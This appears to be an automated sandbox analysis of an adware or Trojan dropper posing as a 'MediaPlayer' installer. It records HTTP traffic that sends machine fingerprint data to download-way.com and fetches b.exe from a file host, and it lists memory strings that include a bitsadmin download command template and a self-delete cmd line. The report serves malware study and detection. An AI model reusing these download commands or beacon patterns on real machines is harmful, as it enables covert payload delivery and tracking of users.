User-Agent: Setup Factory 9.0
Host: uploaded.net
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 302 Found
Server: nginx
Date: Thu, 10 Dec 2015 04:50:07 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
Set-Cookie: PHPSESSID=d88cfbfbdb81d31ee23f60636b045023; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: hXXp://fra-7m22-stor05.uploaded.net/dl/a310a9a0-108b-44cf-bccd-26cb6eec3d08
Vary: Accept-Encoding
GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/cancel1.gif HTTP/1.1
Accept: */*
Referer: hXXp://VVV.download-way.com/index.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cdn2.downloadsoup.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: image/gif
Content-Length: 2881
Connection: keep-alive
Date: Thu, 10 Dec 2015 04:01:56 GMT
Content-Disposition: attachment; filename="cancel1.gif"
Last-Modified: Thu, 26 Feb 2015 16:19:15 GMT
ETag: "d9f00c86bfa3e08e905128b131229fac"
Accept-Ranges: bytes
Server: AmazonS3
Age: 2898
X-Cache: Hit from cloudfront
Via: 1.1 c013a1b33ae2677bcfa21234aa9a4276.cloudfront.net (CloudFront)
X-Amz-Cf-Id: 1xu-Tb0eahQbBrnmv2Hya2cf2FTzY-CyT1tuh8TZs_gM8s6rEt2W-A==
GIF89ae......@.H*.-<.AC.K=.F>.H'. ;.B,./=.E)./)..@.I=.D=.D?.GC.M>.DC.IC.K'.,@.H>.F:.A*./D.LC.M?.HB.L=.G;.A9.@:.C .-;.CuuuB.K(.)>.G)..<.C). @.I>.E...>.G,. ). &. <.E*.&%.*6.C-.3-.33.7).1&.)www(.-*. .../.54.?-.4=.B...!.().0...-.7...G.I..9-.35.7?.F'.0A.O-..,.5<.B>.J ..D.I5.:..5=.GE.K/.0-.-/.2?.=,.7*. ;.B/.4 .'C.I..79.B&.2 .,<.>".*-.0?.C-.-8.>-.&'.12.4:.AC.B1.7-.4..$'. 3.8Q.\<.A<.G4.9 .05.<C.F6.;;.I@.I".%;.B>.Q*.-0.5&.<9.?'.-#.) .6:.A ./..31.57.>4.96.>0.76.<&.)2.78.?-.2-.3ppp..................................................................................................................................................................................................................................................................................................................!..XMP DataXMP<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:5653313B52CD11E48302D8AFAF09E831" xmpMM:DocumentID="xmp.did:5653313C52CD11E48302D8AFAF09E831"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:5653313952CD11E48302D8AFAF
<<< skipped >>>
GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/decline.gif HTTP/1.1
Accept: */*
Referer: hXXp://VVV.download-way.com/index.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cdn2.downloadsoup.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: image/gif
Content-Length: 1293
Connection: keep-alive
Date: Thu, 10 Dec 2015 04:01:58 GMT
Content-Disposition: attachment; filename="decline.gif"
Last-Modified: Thu, 26 Feb 2015 16:19:16 GMT
ETag: "137a96f0655570ffdf65ae14dad52404"
Accept-Ranges: bytes
Server: AmazonS3
Age: 2896
X-Cache: Hit from cloudfront
Via: 1.1 c013a1b33ae2677bcfa21234aa9a4276.cloudfront.net (CloudFront)
X-Amz-Cf-Id: 0kVL2SOnaBGzM82AJcrWkuDanxR0ra8f0cykqeuKfMoD75eZmEx2hQ==
GIF89ae......................................................................................................................................................................................................................................................................................................................................................................................................!.....t.,....e........ns.............n..mB.............FBm.s.C.............AB.DE.............DDI.GGF.............G.I.........(.....HJ.LML..........%....8...z.J.\..a.%N.5qB......8...F......H..F...$)..e.&P.A.I....37>......Ax..JT.N%D..\....)..H.J..U...H..u...[.... ..&/H.{!%.V.m...X0...)Se.......W.P!D.J.... ^.a@..T..(.........B.E....4.<Z4..-2..r....7L.....m*W.Y..........Nc...<.x..a.....Do..........;........{......_.>.. ..3(p....W._9p........{.........z... {[.....Vh...F0@..vX..Y.....D.E..v.!. f.".%j...#bh#._....[....@.)..@.1..[.....L2YD...I..C.X...H@..M2.D.`.....|...h....^.0@.pv.D..`...S.........o....z....7......9.!b.!...Vji. .... ....`<A'..f...T....=......:....0A.[$0@.>......{....a...&.....8@........a...&`...6.l.bP0....;n._. B...@.....l...a.......d......,....k......!h4....G....Wl.j..g....w.q.g.2..$.l..(....,....0..s.4..r......<....6.-t.?.m4.l.<G.o....PG-..TWM..M[...P....X...$d.m..g..@ .;....
<<< skipped >>>
GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/accept.gif HTTP/1.1
Accept: */*
Referer: hXXp://VVV.download-way.com/index.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cdn2.downloadsoup.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: image/gif
Content-Length: 3033
Connection: keep-alive
Date: Thu, 10 Dec 2015 04:01:58 GMT
Content-Disposition: attachment; filename="accept.gif"
Last-Modified: Thu, 26 Feb 2015 16:19:15 GMT
ETag: "3484f982bbd281ea323f9dedb47098ed"
Accept-Ranges: bytes
Server: AmazonS3
Age: 2896
X-Cache: Hit from cloudfront
Via: 1.1 c013a1b33ae2677bcfa21234aa9a4276.cloudfront.net (CloudFront)
X-Amz-Cf-Id: LanaVVYEVn3lXNi5MFBKdcam9x24x111oxFaOberXB-tFe7IvO33vQ==
GIF89ae...............!.(:.AhxjC.M..%...C.E...?.G...gvh*. *./*.3guhwww?.H<.E>.E&.) .->.G;.Appp.....3-.3,./-.2*.-=.E@.H<.A)..@.IC.K'. =.D8.?:.A7.>6.<2.74.91.50.76.>..................C.K...}..o.t ./...............'.,^.d......L.R~..uuu...............J.N...<.C...H.KL.P..................[._&. ...........................|.~......(.-...4.?k.oB.KG.M?.G...[.^;.C...|.....y.}...a.f......;.B...Y.^...j.m.........I.M......?.B>.D............M.Q...........9<.?... .5o.s1.8(.,A.K......C.I%.*..2?.Hgug).1E.Kn.o@.I-.4E.I>.F=.D6.;...'.)*.(*./-.-?.=-..:.C../<.C...5.<=.B?.C...9.@9.A:.A,.2;.B;.BQ.\...O.Tkyl/.3\._8.>'.-/.2>.F?.P<.F*.&-.34.9(.,@.I .....)./=.D3.8&.<C.K#.*C.J .,~.. .&...#.&(.) .2,.3=.F,.5(./...{.}...=.E&.*Y.\-.39.B{.|.........hwi). iyjjzk-.2^.b>.J&.,q.ul.pm.pn.q...M.R......<.A......!..XMP DataXMP<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:325014833434E411B829A1185F1C216E" xmpMM:DocumentID="xmp.did:D165859F343611E4B378E2150F88781F" xmpMM:InstanceID="xmp.iid:D165859E343611E4B378E2150F88781F" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)"> <xmpMM:Deriv
<<< skipped >>>
GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/left_image.png HTTP/1.1
Accept: */*
Referer: hXXp://VVV.download-way.com/index.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cdn2.downloadsoup.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: image/png
Content-Length: 38013
Connection: keep-alive
Date: Wed, 09 Dec 2015 16:41:49 GMT
Content-Disposition: attachment; filename="left_image.png"
Last-Modified: Thu, 26 Feb 2015 16:19:16 GMT
ETag: "69024df30fda549f6ed20e0a65a7face"
Accept-Ranges: bytes
Server: AmazonS3
Age: 43706
X-Cache: Hit from cloudfront
Via: 1.1 c013a1b33ae2677bcfa21234aa9a4276.cloudfront.net (CloudFront)
X-Amz-Cf-Id: LBSU4KwL0l_MWmoVqRuvp8JV3C4H52Je9rOg2soOoU04syQnF7d68Q==
<<< skipped >>>
GET /V31/amipb.js HTTP/1.1
Accept: */*
Referer: hXXp://VVV.download-way.com/index.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cdn1.downloadsoup.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: application/x-javascript
Content-Length: 69260
Connection: keep-alive
Date: Thu, 10 Dec 2015 04:00:05 GMT
Last-Modified: Thu, 26 Nov 2015 15:03:49 GMT
ETag: "f96a7acecd2cfb0d4f3cfca235763504"
x-amz-storage-class: REDUCED_REDUNDANCY
Accept-Ranges: bytes
Server: AmazonS3
Age: 3009
X-Cache: Hit from cloudfront
Via: 1.1 8bed981585e2338012e4dd37a06b0cdb.cloudfront.net (CloudFront)
X-Amz-Cf-Id: 76rLksTr2aHXgtjcgEIqqSLYx8FbPDNzqvKkh14XRZ4mmm5ypuNJNA==
..//<!-- ../* Progress bar */..var g_AmiPbs = new Array();..var g_AmiPbsEx = new Array();..var g_interval = 0;..var g_initComp = 0;..var g_possibleComps = [];..var g_reportedComps = [];..var g_removedComps = [];..var g_notCompatibleWithUpdaterComps = ['LootFindKP'];..var g_postponedComps = ['updater','SHAREit'];..var g_disable_updater = false;..function LogMessage(message) {.. try {.. g_ami.Log(message);.. }.. catch (excpt) {.. }..}..function IsDeclined(name) {.. var declined = 0;.. for (var i = 0; i < g_removedComps.length; i ) {.. if (g_removedComps[i] == name) {.. declined = 1;.. break;.. }.. }.. return declined;..}..function UpdateSkipStatus(sn) {.. if (g_testa && !ArrayContains(g_reportedComps, sn) && !ArrayContains(g_notest, sn) && !ArrayContains(g_notest1, sn)) {.. if (g_testa.constructor != Array || ArrayContains(g_testa, sn)) {.. g_ami.WriteProfileString(g_testf, '', sn, 'S');.. g_reportedComps.push(sn);.. }.. }..}..function ShortNameFromName(name) {.. for (c = 0; c < g_comps.length; c ) {.. if (g_comps[c].name == name) {.. return g_comps[c].sn;.. }.. }.. return name;..}..function UpdateComponentsStatus() {.. LogMessage('UpdateComponentsStatus function started');.. for (var j = 0; j < g_possibleComps.length; j ) {.. if (g_possibleComps[j].sn == 'updater') {.. continue;.. }.. if (g_possibleComps[j].sel !==
<<< skipped >>>
GET /cmu9yf4p HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Setup Factory 9.0
Host: ul.to
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 302 Found
Server: nginx
Date: Thu, 10 Dec 2015 04:50:07 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
Location: hXXp://uploaded.net/file/cmu9yf4p
Vary: Accept-Encoding
POST /index.php HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.download-way.com
Content-Length: 448
Connection: Keep-Alive
Cache-Control: no-cache
Net1.1=&Net2=3.5.21022.08&Net4=4.0.30319&OSversion=NT5.1SP3&Slv=&Sysid=975F29BE8C8FD0BC5E8EBA2BBF1B629F&Sysid1=975F29BE8C8FD0BC5E8EBA2BBF1B629F&X64=N&admin=Y&browser=IEXPLORE.EXE&cavp=&chver=&cmdl=MediaPlayer__15159_il35679.exe&dprod=19C2FB3DEC385401F6FCF22178334A&exe=MediaPlayer__15159_il35679&ffver=&lang_DfltUser=0409&mac=AA==&machg=NzVlZDk1NjctYWE1OC00YzhlLWE4ZWEtM2NhZDdjNDdhYjAzAA==&name=WFAxMAA=&netfs=3&ts=1449723017&ver=1.1.5.55
HTTP/1.1 200 OK
Access-Control-Allow-Origin: hXXp://VVV.somauto.com
Content-Type: text/html; charset=UTF-8
Date: Thu, 10 Dec 2015 04:50:12 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
transfer-encoding: chunked
Connection: keep-alive
21f1.... .. ..<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">.<html>. <head>. <meta http-equiv="content-type" content="text/html; charset=UTF-8" /> . <title>MediaPlayer</title>. <base href="http://VVV.download-way.com:80/index.php" />.<link rel="stylesheet" type="text/css" href="hXXp://cdn2.downloadsoup.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/main.css" /> <script type="text/javascript" src="hXXp://cdn1.downloadsoup.com/V31/amipb.js"></script>. <script type="text/javascript">.var g_r__capp='MediaPlayer';.. var g_amiobj = '', g_ami, g_updb = false, g_close = '1', g_additional_offer_list = '1';. var g_finish_install_button = '1';. var g_popup_install_all = '1';. var g_eula = '
<<< skipped >>>
POST /finalize.php HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: hXXp://VVV.download-way.com/index.php
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.download-way.com
Content-Length: 381
Connection: Keep-Alive
Cache-Control: no-cache
_hdn=0&_ver=1.1.5.55&_p=1&_s=20&_cc=UA&_cid=15159&_psb=0&_cnt=77cf2e0adca2896b80870fc402dc2b9b&_instid=l35679&_brw=ie&_fc=216&_appname=&_appimageurl=&_netfs=-31&_vert=3&r_MediaPlayer=0&r_updater=0.01&r_NationZoom=1&r_OperaRUnew=2&r_AmigoIM=5&r_AnySend=1&r_OperaWW=2&r_PPSvideoPlayer=1&MediaPlayer=3&updater=2&NationZoom=1&OperaRUnew=1&AmigoIM=1&AnySend=1&OperaWW=1&PPSvideoPlayer=1
HTTP/1.1 200 OK
Content-Type: text/xml
Date: Thu, 10 Dec 2015 04:50:13 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
Content-Length: 3285
Connection: keep-alive
<<< skipped >>>
GET /dl/a310a9a0-108b-44cf-bccd-26cb6eec3d08 HTTP/1.1
Accept: */*
Host: fra-7m22-stor05.uploaded.net
User-Agent: Setup Factory 9.0
Cookie: PHPSESSID=d88cfbfbdb81d31ee23f60636b045023
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 10 Dec 2015 04:50:07 GMT
Content-Type: application/octet-stream
Content-Length: 2861977
Last-Modified: Wed, 09 Dec 2015 20:37:36 GMT
Connection: keep-alive
Content-Disposition: attachment; filename="b.exe"
ETag: "56689110-2bab99"
Accept-Ranges: bytes
<<< skipped >>>
GET /down/kabo/apps.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Setup Factory 9.0
Host: bumpacpacba.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
X-Powered-By: PHP/5.4.45
Content-Type: text/html
Content-Length: 32
Date: Thu, 10 Dec 2015 04:50:04 GMT
Accept-Ranges: bytes
Server: LiteSpeed
Connection: close
EDkh679oKhVnvEc2tJ4F2hCvvh3Af0tl..
Map
The Trojan connects to the servers at the following location(s):
Strings from Dumps
MediaPlayer__15159_il35679.exe_1884:
.text
`.rdata
@.data
.rsrc
@.reloc
GetProcessWindowStation
operator
KERNEL32.dll
USER32.dll
ole32.dll
RegCloseKey
RegOpenKeyW
ADVAPI32.dll
GetProcessHeap
GetCPInfo
type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="*" publicKeyToken="6595b64144ccf1df" language="*" />
@mscoree.dll
- CRT not initialized
- Attempt to initialize the CRT more than once.
- floating point support not loaded
kernel32.dll
USER32.DLL
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\MediaPlayer__15159_il35679.exe
MediaPlayer__15159_il35679.exe_1884_rwx_00B20000_0008C000:
.text
`.rdata
@.data
.rsrc
@.reloc
Visual C CRT: Not enough memory to complete call to strerror.
Broken pipe
Inappropriate I/O control operation
Operation not permitted
portuguese-brazilian
operator
GetProcessWindowStation
WinHttpSetStatusCallback
Failed to get the Temp folder: %d
RegOpenKeyTransactedW
RegCreateKeyTransactedW
RegDeleteKeyTransactedW
RegDeleteKeyExW
CInstallationManager::IsPartOfInstallation value=%s
CInstallationManager::SetComponentInstallationEnded %S
%Y-%m-%d %H:%M:%S
CProgressUpdateRequest::CreateInstance %S
CProgressUpdateRequest::ProgressUpdate %S
Send progress update request %s
Progress Request for '%S' return %s
VERSION.dll
KERNEL32.dll
USER32.dll
GDI32.dll
RegDeleteKeyW
RegCloseKey
RegQueryInfoKeyW
RegEnumKeyExW
RegOpenKeyExW
RegCreateKeyExW
ADVAPI32.dll
SHELL32.dll
ole32.dll
OLEAUT32.dll
Secur32.dll
WinHttpCloseHandle
WinHttpOpen
WinHttpSetOption
WinHttpGetProxyForUrl
WinHttpCrackUrl
WinHttpConnect
WinHttpOpenRequest
WinHttpSetStatusCallback
WinHttpSendRequest
WinHttpQueryHeaders
WinHttpQueryDataAvailable
WinHttpReadData
WinHttpReceiveResponse
WINHTTP.dll
GetProcessHeap
GetCPInfo
.?AVAsyncWinHttp@@
.?AV?$_IDispEventLocator@$0MJ@$1?DIID_DWebBrowserEvents2@@3U_GUID@@B@ATL@@
.?AV?$IDispEventSimpleImpl@$0MJ@VCBoot@@$1?DIID_DWebBrowserEvents2@@3U_GUID@@B@ATL@@
.?AUISupportErrorInfo@@
.?AV?$CAtlExeModuleT@VCBootStrapperModule@@@ATL@@
cousins.epoxied.1 = s 'Inst Class'
CLSID = s '{d1b1dc80-beb9-49f1-9a4a-ec9b3dc45143}'
cousins.epoxied = s 'Inst Class'
CurVer = s 'cousins.epoxied.1'
ForceRemove {d1b1dc80-beb9-49f1-9a4a-ec9b3dc45143} = s 'Inst Class'
ProgID = s 'cousins.epoxied.1'
VersionIndependentProgID = s 'cousins.epoxied'
val ServerExecutable = s '%MODULE_RAW%'
TypeLib = s '{0fa5e38b-eb27-4a51-aa61-a0baf2bfc090}'
type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="*" publicKeyToken="6595b64144ccf1df" language="*" />
stdole2.tlbWWW(
msgWd
keyNameW
urlW
url2d
YtcmdLineW
P%CreateIconWW
iconUrlW
regKeyWW
CheckRegKeyW
keyWd
W.launchCommandLineWWW
~cmdW
WDIsShortNameInstalled
Created by MIDL version 7.00.0555 at Wed Dec 09 15:16:39 2015
mscoree.dll
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
wKERNEL32.DLL
WUSER32.DLL
Winhttp.dll
Content-Type: application/x-www-form-urlencoded
shlwapi.dll
HKEY_CURRENT_CONFIG
HKEY_DYN_DATA
HKEY_PERFORMANCE_DATA
HKEY_USERS
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
appimageurl
cmdl
capp=%s&cid=%s&mhx=%S&base=%s
\bitsadmin.exe
\Support Tools\bitsadmin.exe
%sami%s%d%d.exe
%d-%.2d-%.2dT%.2d:%.2d:00
%d-%.2d-%.2dT%.2d:-:00
/retrynav %d
Advapi32.dll
shell32.dll
{23A96663-59D1-4C44-A0DB-1118D9C4ABBA}
OLEAUT32.DLL
kernel32.dll
sn=%s&hx=%S&base=%s
advapi32.dll
v2.0.50727
v1.1.4322
Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice
%ProgramFiles%\Microsoft Silverlight\sllauncher.exe
%ProgramW6432%\Microsoft Silverlight\sllauncher.exe
NT%d.%dSP%d
%ProgramFiles%\Mozilla Firefox\firefox.exe
%d.%d.%d.%d
ami%sExd
bitsadmin /transfer amijob /download /priority high %s %s
ami%sExi
/c del "%s"
cmd.exe
%TEMP%\task.vbs
ami%sExdel
OleAut32.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\MediaPlayer__15159_il35679.exe
{8856F961-340A-11D0-A96B-00C04FD705A2}
1.1.5.55
setup.exe
download-way.com